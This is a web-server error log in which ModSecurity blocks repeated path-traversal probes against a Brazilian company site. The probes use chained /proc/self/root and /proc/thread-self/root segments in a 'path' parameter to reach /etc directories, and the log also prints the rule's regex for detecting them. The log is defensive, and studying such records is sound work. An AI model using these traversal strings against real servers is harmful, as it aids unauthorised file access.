[Mon Mar 16 08:48:38.721646 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:42018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuFnjZBu2q05ozVU88dQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:48:44.803099 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:51706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuHNSswJuvopo3lOhHyAAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:48:54.967239 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:46902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuJglT9VtDQc7bgUyQnQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:49:28.115425 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:55804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuSAlT9VtDQc7bgUyQ0QAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:49:37.279602 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:40760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuUXbQATo66fKoS7wy-gAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:49:39.839232 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.241.46:46844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuUxXjF1vJNtV6CWrhXgAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:49:53.747575 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:46154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuYY6lpbStxTqkSktVWwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:03.571182 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:46846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfua3jZBu2q05ozVU88ywAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:06.199829 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:32790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfubglT9VtDQc7bgUyQ6AAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:50:07.311534 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.241.46:54088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfubwlT9VtDQc7bgUyQ6QAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:08.616844 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.241.46:48642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfucAlT9VtDQc7bgUyQ7AAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:09.973857 2026] [mime_magic:error] [pid 21533:tid 140411666392832] (70014)End of file found: [client 74.7.241.46:48648] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib
[Mon Mar 16 08:50:11.787113 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.241.46:48662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuc3bQATo66fKoS7wzCgAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:50:14.768961 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:48666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfudpqj1wV0Si-OkefQhQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:16.386598 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.241.46:48676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfueHbQATo66fKoS7wzDwAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:50:20.974887 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.241.46:48690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfufAlT9VtDQc7bgUyQ_AAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:22.551158 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.228.16:51510] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfufnjZBu2q05ozVU884QAAAUw"]
[Mon Mar 16 08:50:29.326798 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:47806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuhLysWC90G-1nBrAt2wAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:50:30.684374 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.241.46:34594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuho6lpbStxTqkSktVYAAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:50:31.479638 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:46230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuh3bQATo66fKoS7wzGwAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:31.849476 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:34596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuh3bQATo66fKoS7wzHAAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:50:43.223404 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.241.46:34596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuk3bQATo66fKoS7wzKgAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:51:19.435420 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:45696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfut_9ocpUE4ed4uDzVvwAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:51:22.875417 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:55666] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuuv9ocpUE4ed4uDzVwgAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
